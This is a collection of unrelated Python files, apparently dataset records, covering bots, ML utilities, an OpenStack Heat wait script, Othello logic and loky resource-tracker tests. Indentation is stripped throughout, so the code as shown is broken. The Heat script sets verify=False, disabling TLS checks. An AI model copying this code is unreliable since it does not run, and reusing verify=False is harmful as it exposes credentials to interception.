items = [str(index) + ': '+ content for index, content in enumerate(getDB(msg))]
if not items:
return msg.reply_text('FAIL. no loop items yet.', quote=False)
msg.reply_text('\n\n'.join(items), quote=False, disable_web_page_preview=True)
def remove(msg, content):
db = getDB(msg)
try:
index = int(content)
except:
return msg.reply_text('FAIL. index not valid: ' + content, quote=False)
if len(db) <= index:
return msg.reply_text('FAIL. index out of range: ' + content, quote=False)
del db[index]
saveDB()
msg.reply_text('success', quote=False)
def manage(update, context):
try:
msg = update.effective_message
if not msg:
return
command, content = splitCommand(msg.text)
if ('add' in command) and content:
return add(msg, content)
if 'list' in command:
return listLoop(msg)
if 'remove' in command:
return remove(msg, content)
msg.reply_text(START_MESSAGE, quote=False)
except Exception as e:
print(e)
tb.print_exc()
context.bot.send_message(chat_id=debug_group, text=str(e))
def start(update, context):
try:
update.effective_message.reply_text(START_MESSAGE, quote=False)
except Exception as e:
print(e)
tb.print_exc()
def loopImp():
for key in DB:
loopLen = len(DB[key])
if not loopLen:
continue
index = loopPos.get(key, random.randint(0, loopLen - 1))
if index >= loopLen:
updater.bot.send_message(chat_id=debug_group, text='Should only happen why removed items from list')
index = 0
updater.bot.send_message(
chat_id=key,
text=DB[key][index])
loopPos[key] = (index + 1) % loopLen
updater = Updater(CREDENTIALS['bot_token'], use_context=True)
dp = updater.dispatcher
dp.add_handler(MessageHandler(Filters.command, manage))
dp.add_handler(MessageHandler(Filters.private & (~Filters.command), start))
def loop():
try:
loopImp()
except Exception as e:
print(e)
tb.print_exc()
updater.bot.send_message(chat_id=debug_group, text=str(e))
threading.Timer(INTERVAL, loop).start()
loop()
updater.start_polling()
updater.idle()
|
nilq/baby-python
|
python
|
# Copyright 2019 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""BuildSpec helper."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import click
from typing import Text
import yaml
from tfx.tools.cli.container_builder import labels
class BuildSpec(object):
"""Build specification.
BuildSpec generates a default build spec if it does not exist.
Attributes:
filename: build spec filename.
build_context: build working directory.
_buildspec: in-memory representation of the build spec.
"""
def __init__(self,
filename: Text = labels.BUILD_SPEC_FILENAME):
self._filename = filename
if not os.path.exists(self._filename):
raise ValueError('BuildSpec:: build spec file %s does not exist.' %
filename)
self._read_existing_build_spec()
@staticmethod
def load_default(filename: Text = labels.BUILD_SPEC_FILENAME,
target_image: Text = None,
build_context: Text = labels.BUILD_CONTEXT,
dockerfile_name: Text = labels.DOCKERFILE_NAME):
"""Generate a default build spec yaml."""
if os.path.exists(filename):
raise ValueError('BuildSpec: build spec file %s already exists.' %
filename)
if target_image is None:
raise ValueError('BuildSpec: target_image is not given.')
build_spec = {
'apiVersion': labels.SKAFFOLD_API_VERSION,
'kind': 'Config',
'build': {
'artifacts': [{
'image': target_image,
'workspace': build_context,
'docker': {
'dockerfile': dockerfile_name
}
}]
}
}
with open(filename, 'w') as f:
yaml.dump(build_spec, f)
return BuildSpec(filename)
def _read_existing_build_spec(self):
"""Read existing build spec yaml."""
with open(self.filename, 'r') as f:
click.echo('Reading build spec from %s' % self.filename)
self._buildspec = yaml.safe_load(f)
if len(self._buildspec['build']['artifacts']) != 1:
raise RuntimeError('The build spec contains multiple artifacts however'
'only one is supported.')
self._build_context = self._buildspec['build']['artifacts'][0][
'workspace']
@property
def filename(self):
return self._filename
@property
def build_context(self):
return self._build_context
|
nilq/baby-python
|
python
|
from setuptools import setup
setup(
name="backbones",
version="0.1",
description="Common neural network architectures implemented in PyTorch.",
url="https://github.com/bentaculum/backbones",
author="Benjamin Gallusser",
author_email="benjamin.gallusser@epfl.ch",
license="MIT",
install_requires=[
'pytest',
'torch',
],
)
|
nilq/baby-python
|
python
|
from typing import List, Tuple, Callable, Optional
import numpy as np
import tweedie
from gluonts.model.forecast import SampleForecast, QuantileForecast
from scipy.optimize import fmin_l_bfgs_b
from scipy.special import gammaln, factorial, psi
from scipy.stats import norm, beta, gamma, nbinom, poisson
from sklearn.preprocessing import MinMaxScaler
from statsmodels.distributions import ECDF
def pool_forecast_transform_fn(
input_: Tuple[SampleForecast, int],
forecast_transform_fn: Callable[[SampleForecast, int], List[float]],
) -> List[float]:
forecast, stock = input_
return forecast_transform_fn(forecast, stock)
def calculate_out_of_stock_days_from_samples(
forecast: SampleForecast, stock: int, total_days: int = 30
) -> np.ndarray:
sample_days = np.apply_along_axis(
np.searchsorted, 1, np.cumsum(forecast.samples, axis=1) >= stock, True
)
sample_days[sample_days == total_days] -= 1
return sample_days + 1
def calculate_out_out_stock_days_from_quantiles(
forecast: QuantileForecast, stock: int, total_days: int = 30
) -> np.ndarray:
quantile_days = np.apply_along_axis(
np.searchsorted, 1, np.cumsum(forecast.forecast_array, axis=1) >= stock, True
)
quantile_days[quantile_days == total_days] -= 1
return quantile_days + 1
def old_cdf_to_probas(cdf: List[float]) -> List[float]:
prob_array = np.array(np.ediff1d(cdf, to_begin=cdf[0]))
return list(prob_array / np.sum(prob_array))
def cdf_fn_to_probas(
cdf_fn: Callable[[float], float], total_days: int = 30
) -> List[float]:
prob_array = np.ediff1d([cdf_fn(i) for i in range(0, total_days + 1)])
return list(prob_array / np.sum(prob_array))
def _calculate_std(sample_days: np.ndarray, fixed_std: Optional[float], std_scaler: Optional[MinMaxScaler]):
if fixed_std:
std = fixed_std
elif std_scaler:
std = std_scaler.transform(sample_days.std().reshape(-1, 1))[0][0]
else:
std = sample_days.std()
return std
def apply_tweedie(
sample_days: np.ndarray,
phi: float = 2.0,
power: float = 1.3,
fixed_std: float = None,
std_scaler: MinMaxScaler = None,
total_days: int = 30,
) -> List[float]:
mu = sample_days.mean()
if phi < 0:
sigma = _calculate_std(sample_days, fixed_std, std_scaler)
phi = (sigma ** 2) / mu ** power
distro = tweedie.tweedie(p=power, mu=mu, phi=phi)
return cdf_fn_to_probas(distro.cdf, total_days=total_days)
def apply_normal(
sample_days: np.ndarray,
fixed_std: float = None,
std_scaler: MinMaxScaler = None,
total_days: int = 30,
) -> List[float]:
distro = norm(sample_days.mean(), _calculate_std(sample_days, fixed_std, std_scaler))
return cdf_fn_to_probas(distro.cdf, total_days=total_days)
def apply_ecdf(sample_days: np.ndarray, total_days: int = 30) -> List[float]:
ecdf = ECDF(sample_days)
return cdf_fn_to_probas(ecdf, total_days=total_days)
def apply_beta(
sample_days: np.ndarray, fixed_std: float = None,
std_scaler: MinMaxScaler = None, total_days: int = 30
) -> List[float]:
mu = sample_days.mean() / total_days
sigma = _calculate_std(sample_days, fixed_std, std_scaler) / total_days
a = mu ** 2 * ((1 - mu) / sigma ** 2 - 1 / mu)
b = a * (1 / mu - 1)
distro = beta(a, b)
return cdf_fn_to_probas(distro.cdf, total_days=total_days)
# X is a numpy array representing the data
# initial params is a numpy array representing the initial values of
# size and prob parameters
def _fit_nbinom(X: np.ndarray, initial_params=None) -> Tuple[float, float]:
infinitesimal = np.finfo(np.float).eps
def log_likelihood(params, *args):
r, p = params
X = args[0]
N = X.size
# MLE estimate based on the formula on Wikipedia:
# http://en.wikipedia.org/wiki/Negative_binomial_distribution#Maximum_likelihood_estimation
result = (
np.sum(gammaln(X + r))
- np.sum(np.log(factorial(X)))
- N * (gammaln(r))
+ N * r * np.log(p)
+ np.sum(X * np.log(1 - (p if p < 1 else 1 - infinitesimal)))
)
return -result
def log_likelihood_deriv(params, *args):
r, p = params
X = args[0]
N = X.size
pderiv = (N * r) / p - np.sum(X) / (1 - (p if p < 1 else 1 - infinitesimal))
rderiv = np.sum(psi(X + r)) - N * psi(r) + N * np.log(p)
return np.array([-rderiv, -pderiv])
if initial_params is None:
# reasonable initial values (from fitdistr function in R)
m = np.mean(X)
v = np.var(X)
size = (m ** 2) / (v - m) if v > m else 10
# convert mu/size parameterization to prob/size
p0 = size / ((size + m) if size + m != 0 else 1)
r0 = size
initial_params = np.array([r0, p0])
bounds = [(infinitesimal, None), (infinitesimal, 1)]
optimres = fmin_l_bfgs_b(
log_likelihood,
x0=initial_params,
# fprime=log_likelihood_deriv,
args=(X,),
approx_grad=1,
bounds=bounds,
)
params = optimres[0]
return (params[0], params[1])
def apply_fitted_negative_binomial(
sample_days: np.ndarray, total_days: int = 30
) -> List[float]:
distro = nbinom(*_fit_nbinom(sample_days))
return cdf_fn_to_probas(distro.cdf, total_days=total_days)
def apply_negative_binomial(
sample_days: np.ndarray,
fixed_std: float = None,
std_scaler: MinMaxScaler = None,
total_days: int = 30,
) -> List[float]:
mu = sample_days.mean()
sigma = _calculate_std(sample_days, fixed_std, std_scaler)
var = sigma ** 2
r = (mu ** 2) / (var - mu) if var > mu else total_days
p = r / ((r + mu) if r + mu != 0 else 1)
distro = nbinom(r, p)
return cdf_fn_to_probas(distro.cdf, total_days=total_days)
def apply_poisson(sample_days: np.ndarray, total_days: int = 30) -> List[float]:
distro = poisson(sample_days.mean())
return cdf_fn_to_probas(distro.cdf, total_days=total_days)
def apply_fitted_gamma(sample_days: np.ndarray, total_days: int = 30) -> List[float]:
shape, loc, scale = gamma.fit(sample_days)
distro = gamma(shape, loc, scale)
return cdf_fn_to_probas(distro.cdf, total_days=total_days)
|
nilq/baby-python
|
python
|
import argparse
import os
import time
from keystoneauth1 import loading
from keystoneauth1 import session
from heatclient import client
_TERMINAL = [
'CREATE_FAILED',
'CREATE_COMPLETE',
'UPDATE_FAILED',
'UPDATE_COMPLETE'
]
_INTERVAL = 20
def get_session():
"""Get a keystone session
:returns: Keystone session
:rtype: session.Session
"""
loader = loading.get_plugin_loader('password')
auth = loader.load_from_options(
auth_url=os.environ.get('OS_AUTH_URL'),
username=os.environ.get('OS_USERNAME'),
password=os.environ.get('OS_PASSWORD'),
project_name=os.environ.get('OS_PROJECT_NAME'),
project_domain_name=os.environ.get('OS_PROJECT_DOMAIN_NAME'),
user_domain_name=os.environ.get('OS_USER_DOMAIN_NAME')
)
return session.Session(auth=auth, verify=False)
def get_heat():
"""Get instance of heat client.
:returns: Heat client instance.
:rtype: heatclient.client.Client
"""
return client.Client('1', session=get_session())
parser = argparse.ArgumentParser()
parser.add_argument('stack', type=str, help='Name or ID of stack')
parser.add_argument(
'timeout',
type=int,
help='How many seconds to wait for Create Complete Status.'
)
args = parser.parse_args()
heat = get_heat()
start = time.time()
while time.time() - start < args.timeout:
stack = heat.stacks.get(args.stack)
status = stack.stack_status
print "Status of {} is {}".format(args.stack, stack.stack_status)
if status in _TERMINAL:
if status == 'CREATE_COMPLETE':
exit()
else:
raise Exception(
"Unexpected terminal status {} for stack {}."
.format(status, args.stack)
)
else:
time.sleep(_INTERVAL)
raise Exception("Ran out of time waiting for stack {}.".format(args.stack))
|
nilq/baby-python
|
python
|
from pydantic import BaseModel
#fastapi接口的数据模型
class User(BaseModel):
first_name: str
last_name: str
age: int
class Config:
orm_mode = True
|
nilq/baby-python
|
python
|
import sys
import getpass
from mlflow.tracking.context.abstract_context import RunContextProvider
from mlflow.entities import SourceType
from mlflow.utils.mlflow_tags import (
MLFLOW_USER,
MLFLOW_SOURCE_TYPE,
MLFLOW_SOURCE_NAME,
)
_DEFAULT_USER = "unknown"
def _get_user():
"""Get the current computer username."""
try:
return getpass.getuser()
except ImportError:
return _DEFAULT_USER
def _get_main_file():
return sys.argv[0] if len(sys.argv) > 0 else None
def _get_source_name():
main_file = _get_main_file()
if main_file is not None:
return main_file
return "<console>"
def _get_source_type():
return SourceType.LOCAL
class DefaultRunContext(RunContextProvider):
def in_context(self):
return True
def tags(self):
return {
MLFLOW_USER: _get_user(),
MLFLOW_SOURCE_NAME: _get_source_name(),
MLFLOW_SOURCE_TYPE: SourceType.to_string(_get_source_type()),
}
|
nilq/baby-python
|
python
|
import numpy as np
import torch
from torch.utils.data import Dataset
from torch.utils.data.dataloader import default_collate
from fairseq.data.fairseq_dataset import FairseqDataset
def sine(phase, amplitude, x):
return np.sin(x + phase) * amplitude
class SineDataset(Dataset):
def __init__(self, split, phase, amplitude, rng):
self.rng = rng
if split == 'train':
# All of the x points
self.x = np.linspace(-5, 5, 50, dtype=np.float32)[:, None]
self.y = sine(phase=phase, amplitude=amplitude, x=self.x)
elif split == 'test':
# All of the x points
all_data = np.linspace(-5, 5, 50, dtype=np.float32)[:, None]
self.x = all_data[np.array([3, 3, 39, 9, 19, 21, 36, 23, 6, 24])]
self.y = sine(phase=phase, amplitude=amplitude, x=self.x)
elif split == 'valid':
# Create a validation split
self.x = np.linspace(-4, 4, 50, dtype=np.float32)[:, None]
self.y = sine(phase=phase, amplitude=amplitude, x=self.x)
else:
raise NotImplementedError
def __len__(self):
return len(self.x)
def __getitem__(self, item):
return self.x[item], self.y[item]
class SineFairseqDataset(SineDataset, FairseqDataset):
"""A dataset that provides helpers for batching."""
def __init__(self, split, phase, amplitude, rng, shuffle, half):
super().__init__(split=split, phase=phase, amplitude=amplitude, rng=rng)
self.shuffle = shuffle
self.half = half
def collater(self, samples):
"""Merge a list of samples to form a mini-batch.
Args:
samples (List[int]): sample indices to collate
Returns:
dict: a mini-batch suitable for forwarding with a Model
"""
mini_batch = default_collate(samples)
assert len(mini_batch) == 2
if self.half:
mini_batch[0] = mini_batch[0].half()
mini_batch[1] = mini_batch[1].half()
id = torch.LongTensor(range(len(samples)))
nsentences = len(samples)
lengths = torch.ones(nsentences, 1)
mini_batch_dict = {'net_input': {'src_tokens': mini_batch[0], 'src_lengths': lengths},
'target': mini_batch[1],
'id': id,
'nsentences': nsentences}
return mini_batch_dict
def get_dummy_batch(self, num_tokens, max_positions, src_len=1, tgt_len=1):
"""Return a dummy batch with a given number of tokens."""
x = torch.zeros(num_tokens, 1)
y = torch.zeros(num_tokens, 1)
l = torch.ones(num_tokens, 1)
id = torch.LongTensor(range(num_tokens))
return {'net_input': {'src_tokens': x, 'src_lengths': l}, 'target': y, 'id': id, 'nsentences': num_tokens}
def num_tokens(self, index):
"""Return the number of tokens in a sample. This value is used to
enforce ``--max-tokens`` during batching."""
return 1
def size(self, index):
"""Return an example's size as a float or tuple. This value is used when
filtering a dataset with ``--max-positions``."""
return 1
def ordered_indices(self):
"""Return an ordered list of indices. Batches will be constructed based
on this order."""
num_train_examples = len(self)
if self.shuffle:
return self.rng.permutation(num_train_examples)
else:
return range(num_train_examples)
|
nilq/baby-python
|
python
|
import socket
server = "localhost" #settings
channel = "#domino"
botnick = "firestorck_bot"
print("Server : ", server)
print("Channel : ", channel)
print("Name : ", botnick)
irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #defines the socket
print ("connecting to: "+server)
irc.connect((server, 6667))
SenderRunning, ListenerRunning = 1, 1
ConvUser = ""
|
nilq/baby-python
|
python
|
import numpy as np
import copy as cp
DIRECTIONS = [np.array((0, 1)), np.array((1, 0)), np.array((1, 1)),
np.array((0, -1)), np.array((-1, 0)), np.array((-1, -1)), np.array((1, -1)), np.array((-1, 1))]
class State:
def __init__(self, grid=None, previous_skip=False, side=2, master_side=2):
if grid is None:
self.grid = [6 * [0] for i in range(6)]
self.grid[2][2] = 1
self.grid[2][3] = 2
self.grid[3][2] = 2
self.grid[3][3] = 1
else:
self.grid = grid
self.side = side
self.previous_skip = previous_skip
self.master_side = master_side
def get_legal_actions(self):
'''
Modify according to your game or
needs. Constructs a list of all
possible actions from current state.
Returns a list.
'''
return get_side_moves(self.grid, self.side)
def is_game_over(self):
'''
Modify according to your game or
needs. It is the game over condition
and depends on your game. Returns
true or false
'''
return is_game_over(self.grid, self.side, self.previous_skip)
def game_result(self):
'''
Modify according to your game or
needs. Returns 1 or 0 or -1 depending
on your state corresponding to win,
tie or a loss.
'''
return get_winning_side(self.grid, self.master_side)
def move(self, action):
'''
Modify according to your game or
needs. Changes the state of your
board with a new value. For a normal
Tic Tac Toe game, it can be a 3 by 3
array with all the elements of array
being 0 initially. 0 means the board
position is empty. If you place x in
row 2 column 3, then it would be some
thing like board[2][3] = 1, where 1
represents that x is placed. Returns
the new state after making a move.
'''
new_state = State(grid=cp.deepcopy(self.grid), previous_skip=self.previous_skip, side=self.side,
master_side=self.master_side)
apply_move(new_state, action)
new_state.side = 3 - self.side
return new_state
def __str__(self):
string = f"Current player {self.side}\n"
for line in self.grid:
string += str(line) + "\n"
return string
def __repr__(self):
return self.__str__()
def position_in_grid(grid, position):
return 0 <= position[0] < len(grid) and 0 <= position[1] < len(grid[0])
def get_claimable_positions_from(grid: list[list[int]], source: np.ndarray):
disk_side = grid[source[0]][source[1]]
other_side = 3 - disk_side
claimable_pos = []
for vector in DIRECTIONS:
new_pos = source + vector
if position_in_grid(grid, new_pos) and grid[new_pos[0]][new_pos[1]] == other_side:
while position_in_grid(grid, new_pos) and grid[new_pos[0]][new_pos[1]] == other_side:
new_pos += vector
if position_in_grid(grid, new_pos) and grid[new_pos[0]][new_pos[1]] == 0:
claimable_pos.append(new_pos)
return claimable_pos
def get_side_disks(grid, side):
disks = []
for i in range(len(grid)):
for j in range(len(grid[i])):
if grid[i][j] == side:
disks.append(np.array((i, j)))
return disks
def get_side_moves(grid, side):
disks = get_side_disks(grid, side)
moves = {}
for coord in disks:
disk_moves = get_claimable_positions_from(grid, coord)
for move in disk_moves:
non_mutable_coord = tuple(move)
if non_mutable_coord not in moves:
moves[non_mutable_coord] = [coord]
else:
moves[non_mutable_coord] += [coord]
side_moves = [None]
if len(moves) > 0:
side_moves = [[move, moves[move]] for move in moves.keys()]
return side_moves
def apply_move(state, move):
if move is not None:
state.previous_skip = False
coord, list_position_from = move[0], move[1]
state.grid[coord[0]][coord[1]] = state.side
for position_from in list_position_from:
direction = position_from - coord
# getting the vector back to one unit for each direction
if direction[0] > 0:
direction[0] = 1
elif direction[0] < 0:
direction[0] = -1
if direction[1] > 0:
direction[1] = 1
elif direction[1] < 0:
direction[1] = -1
new_pos = coord + direction
while new_pos[0] != position_from[0] or new_pos[1] != position_from[1]:
state.grid[new_pos[0]][new_pos[1]] = state.side
new_pos += direction
else:
state.previous_skip = True
def explore_all_possible_games(state: State):
moves = state.get_legal_actions()
for move in moves:
explore_all_possible_games(state.move(move))
def get_winning_side(grid, master_side):
side_count = {1: 0, 2: 0}
for line in grid:
for tile in line:
if tile:
side_count[tile] += 1
if side_count[1] == side_count[2]:
return 0
elif side_count[1] > side_count[2]:
if master_side == 1:
return 1
else:
return -1
else:
if master_side == 2:
return 1
else:
return -1
def position_can_claim(grid: list[list[int]], source: np.ndarray):
disk_side = grid[source[0]][source[1]]
other_side = 3 - disk_side
for vector in DIRECTIONS:
new_pos = source + vector
if position_in_grid(grid, new_pos) and grid[new_pos[0]][new_pos[1]] == other_side:
while position_in_grid(grid, new_pos) and grid[new_pos[0]][new_pos[1]] == other_side:
new_pos += vector
if position_in_grid(grid, new_pos) and grid[new_pos[0]][new_pos[1]] == 0:
return True
return False
def is_game_over(grid, side, previous_skip):
if previous_skip:
disks = get_side_disks(grid, side)
for coord in disks:
if position_can_claim(grid, coord):
return False
return True
return False
# Othello default grid
# grid = [8 * [0] for i in range(8)]
# grid[3][3] = 1
# grid[3][4] = 2
# grid[4][3] = 2
# grid[4][4] = 1
# Othello 6*6 grid
# grid = [6 * [0] for i in range(6)]
# grid[2][2] = 1
# grid[2][3] = 2
# grid[3][2] = 2
# grid[3][3] = 1
|
nilq/baby-python
|
python
|
import os
import glob
import shutil
import tempfile
import numpy as np
import common
import features
import folds
from audio_toolbox import ffmpeg, sox
from constants import *
def normalize(input_file):
temp_dir = tempfile.mkdtemp()
transcoded_file = os.path.join(temp_dir, 'transcoded.flac')
ffmpeg.transcode(input_file, transcoded_file)
if not args.keep_silence:
trimmed_file = os.path.join(temp_dir, 'trimmed.flac')
sox.remove_silence(
transcoded_file,
trimmed_file,
min_duration_sec=args.silence_min_duration_sec,
threshold=args.silence_threshold)
else:
trimmed_file = transcoded_file
duration = sox.get_duration(trimmed_file)
duration = int((duration // FRAGMENT_DURATION) * FRAGMENT_DURATION)
normalized_file = os.path.join(temp_dir, 'normalized.flac')
sox.normalize(trimmed_file, normalized_file, duration_in_sec=duration)
return normalized_file, temp_dir
def load_samples(normalized_file):
temp_dir = tempfile.mkdtemp()
fragmented_file = os.path.join(temp_dir, 'fragment@n.flac')
sox.split(normalized_file, fragmented_file, FRAGMENT_DURATION)
features.process_audio(temp_dir)
samples = []
for file in glob.glob(os.path.join(temp_dir, '*.npz')):
sample = np.load(file)[DATA_KEY]
sample = folds.normalize_fb(sample)
assert sample.shape == INPUT_SHAPE
assert sample.dtype == DATA_TYPE
samples.append(sample)
samples = np.array(samples)
return samples, temp_dir
def predict(model_file):
import keras.models
_, languages = common.build_label_binarizer()
model = keras.models.load_model(model_file)
results = model.predict(samples)
scores = np.zeros(len(languages))
for result in results:
scores[np.argmax(result)] += 1
return scores, languages
def clean(paths):
for path in paths:
shutil.rmtree(path)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description='Test the model.')
parser.add_argument(
'input',
help='a path to an audio file')
parser.add_argument(
'--model',
dest='model',
help='a path to the H5 model file; the default is `model.h5`')
parser.add_argument(
'--silence-threshold',
dest='silence_threshold',
type=float,
help=("indicates what sample value you should treat as silence; "
"the default is `0.5`"))
parser.add_argument(
'--silence-min-duration',
dest='silence_min_duration_sec',
type=float,
help=("specifies a period of silence that must exist before audio is "
"not copied any more; the default is `0.1`"))
parser.add_argument(
'--keep-silence',
dest='keep_silence',
action='store_true',
help='don\'t remove silence from samples')
parser.add_argument(
'--keep-temp-files',
dest='keep_temp_files',
action='store_true',
help='don\'t remove temporary files when done')
parser.add_argument(
'--verbose',
dest='verbose',
action='store_true',
help='print more logs')
parser.set_defaults(
model='model.h5',
keep_silence=False,
silence_min_duration_sec=0.1,
silence_threshold=0.5,
keep_temp_files=False,
verbose=False)
args = parser.parse_args()
if not args.verbose:
# supress all warnings
import warnings
warnings.filterwarnings("ignore")
# supress tensorflow warnings
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
normalized_file, normalized_dir = normalize(args.input)
samples, samples_dir = load_samples(normalized_file)
if not args.keep_temp_files:
clean((normalized_dir, samples_dir))
scores, languages = predict(args.model)
total = np.sum(scores)
for language_idx, language in enumerate(languages):
score = scores[language_idx]
print("{language}: {percent:.2f}% ({amount:.0f})".format(
language=language,
percent=(score / total) * 100,
amount=score))
|
nilq/baby-python
|
python
|
import django_describer.actions
import django_describer.datatypes
import django_describer.permissions
import django_describer.describers
import django_describer.utils
import django_describer.adapters
name = "django_describer"
|
nilq/baby-python
|
python
|
from ctypes import *
from .jenv import *
from . import Object
from . import ClassUtils
from . import Executable
from . import String
from . import Modifier
class Method(Executable.Executable, Modifier.Modifier):
_isInit = None
_Class = None
_getName = None
_getReturnType = None
_count = 0
def __init__(self, obj):
Method._count = Method._count + 1
class_name = "Ljava/lang/reflect/Method;"
Executable.Executable.__init__(self, class_name, obj)
Modifier.Modifier.__init__(self)
if(not Method._isInit):
Method._Class = ClassUtils.fromFullyQualifiedName(class_name)
if(not Method._Class):
print("Failed to find Method class")
Method._getName = GetMethodID(Method._Class.getClass(), "getName", "()Ljava/lang/String;")
if(not Method._getName):
print("Failed to find getName")
Method._getReturnType = GetMethodID(Method._Class.getClass(), "getReturnType", "()Ljava/lang/Class;")
if(not Method._getReturnType):
print("Failed to find getReturnType")
Method._isInit = True
def __del__(self):
Modifier.Modifier.__del__(self)
Executable.Executable.__del__(self)
if(Method._isInit and Method._count == 1):
del(Method._Class)
Method._Class = None
Method._isInit = False
Method._count = Method._count - 1
def getName(self):
return String.String(CallObjectMethod(self.obj, Method._getName))
def getReturnType(self):
return ClassUtils.fromJclass(CallObjectMethod(self.obj, Method._getReturnType))
def descriptor(self):
desc = super(Method, self).descriptor()
ret_type = self.getReturnType().internalTypeSignature()
return desc + ret_type
|
nilq/baby-python
|
python
|
"""Tests for the ResourceTracker class"""
import errno
import gc
import os
import pytest
import re
import signal
import subprocess
import sys
import time
import warnings
import weakref
from loky import ProcessPoolExecutor
import loky.backend.resource_tracker as resource_tracker
from loky.backend.context import get_context
from .utils import resource_unlink, create_resource, resource_exists
def _resource_unlink(name, rtype):
resource_tracker._CLEANUP_FUNCS[rtype](name)
def get_rtracker_pid():
resource_tracker.ensure_running()
return resource_tracker._resource_tracker._pid
class TestResourceTracker:
@pytest.mark.parametrize("rtype", ["file", "folder", "semlock"])
def test_resource_utils(self, rtype):
# Check that the resouce utils work as expected in the main process
if sys.platform == "win32" and rtype == "semlock":
pytest.skip("no semlock on windows")
name = create_resource(rtype)
assert resource_exists(name, rtype)
resource_unlink(name, rtype)
assert not resource_exists(name, rtype)
def test_child_retrieves_resource_tracker(self):
parent_rtracker_pid = get_rtracker_pid()
executor = ProcessPoolExecutor(max_workers=2)
child_rtracker_pid = executor.submit(get_rtracker_pid).result()
# First simple pid retrieval check (see #200)
assert child_rtracker_pid == parent_rtracker_pid
# Register a resource in the parent process, and un-register it in the
# child process. If the two processes do not share the same
# resource_tracker, a cache KeyError should be printed in stderr.
cmd = '''if 1:
import os, sys
from loky import ProcessPoolExecutor
from loky.backend import resource_tracker
from tempfile import NamedTemporaryFile
tmpfile = NamedTemporaryFile(delete=False)
tmpfile.close()
filename = tmpfile.name
resource_tracker.VERBOSE = True
resource_tracker.register(filename, "file")
def maybe_unlink(name, rtype):
# resource_tracker.maybe_unlink is actually a bound method of the
# ResourceTracker. We need a custom wrapper to avoid object
# serialization.
from loky.backend import resource_tracker
resource_tracker.maybe_unlink(name, rtype)
print(filename)
e = ProcessPoolExecutor(1)
e.submit(maybe_unlink, filename, "file").result()
e.shutdown()
'''
try:
p = subprocess.run([sys.executable, '-E', '-c', cmd],
capture_output=True,
text=True)
filename = p.stdout.strip()
pattern = f"decremented refcount of file {filename}"
assert pattern in p.stderr
assert "leaked" not in p.stderr
pattern = f"KeyError: '{filename}'"
assert pattern not in p.stderr
finally:
executor.shutdown()
# The following four tests are inspired from cpython _test_multiprocessing
@pytest.mark.parametrize("rtype", ["file", "folder", "semlock"])
def test_resource_tracker(self, rtype):
#
# Check that killing process does not leak named resources
#
if (sys.platform == "win32") and rtype == "semlock":
pytest.skip("no semlock on windows")
cmd = f'''if 1:
import time, os, tempfile, sys
from loky.backend import resource_tracker
from utils import create_resource
for _ in range(2):
rname = create_resource("{rtype}")
resource_tracker.register(rname, "{rtype}")
# give the resource_tracker time to register the new resource
time.sleep(0.5)
sys.stdout.write(f"{{rname}}\\n")
sys.stdout.flush()
time.sleep(10)
'''
env = os.environ.copy()
env['PYTHONPATH'] = os.path.dirname(__file__)
p = subprocess.Popen([sys.executable, '-c', cmd],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
env=env,
text=True)
name1 = p.stdout.readline().rstrip()
name2 = p.stdout.readline().rstrip()
# subprocess holding a reference to lock1 is still alive, so this call
# should succeed
_resource_unlink(name1, rtype)
p.terminate()
p.wait()
# wait for the resource_tracker to cleanup the leaked resources
time.sleep(2.0)
with pytest.raises(OSError) as ctx:
_resource_unlink(name2, rtype)
# docs say it should be ENOENT, but OSX seems to give EINVAL
assert ctx.value.errno in (errno.ENOENT, errno.EINVAL)
err = p.stderr.read()
p.stderr.close()
p.stdout.close()
expected = (f'resource_tracker: There appear to be 2 leaked {rtype}')
assert re.search(expected, err) is not None
# resource 1 is still registered, but was destroyed externally: the
# tracker is expected to complain.
if sys.platform == "win32":
errno_map = {'file': 2, 'folder': 3}
expected = (
f"resource_tracker: {re.escape(name1)}: "
f"(WindowsError\\(({errno_map[rtype]})|FileNotFoundError)"
)
else:
expected = (
f"resource_tracker: {re.escape(name1)}: "
f"(OSError\\({errno.ENOENT}|FileNotFoundError)"
)
assert re.search(expected, err) is not None
@pytest.mark.parametrize("rtype", ["file", "folder", "semlock"])
def test_resource_tracker_refcounting(self, rtype):
if sys.platform == "win32" and rtype == "semlock":
pytest.skip("no semlock on windows")
cmd = f'''if 1:
import os
import tempfile
import time
from loky.backend import resource_tracker
from utils import resource_unlink, create_resource, resource_exists
resource_tracker.VERBOSE = True
try:
name = create_resource("{rtype}")
assert resource_exists(name, "{rtype}")
from loky.backend.resource_tracker import _resource_tracker
_resource_tracker.register(name, "{rtype}")
_resource_tracker.register(name, "{rtype}")
# Forget all information about the resource, but do not try to
# remove it
_resource_tracker.unregister(name, "{rtype}")
time.sleep(1)
assert resource_exists(name, "{rtype}")
_resource_tracker.register(name, "{rtype}")
_resource_tracker.register(name, "{rtype}")
_resource_tracker.maybe_unlink(name, "{rtype}")
time.sleep(1)
assert resource_exists(name, "{rtype}")
_resource_tracker.maybe_unlink(name, "{rtype}")
for _ in range(100):
if not resource_exists(name, "{rtype}"):
break
time.sleep(.1)
else:
raise AssertionError(f"{{name}} was not unlinked in time")
finally:
try:
if resource_exists(name, "{rtype}"):
resource_unlink(name, "{rtype}")
except NameError:
# "name" is not defined because create_resource has failed
pass
'''
env = {**os.environ, 'PYTHONPATH': os.path.dirname(__file__)}
p = subprocess.run([sys.executable, '-c', cmd],
capture_output=True,
env=env)
assert p.returncode == 0, p.stderr
def check_resource_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from loky.backend.resource_tracker import _resource_tracker
pid = _resource_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
os.waitpid(pid, 0)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = get_context("loky")
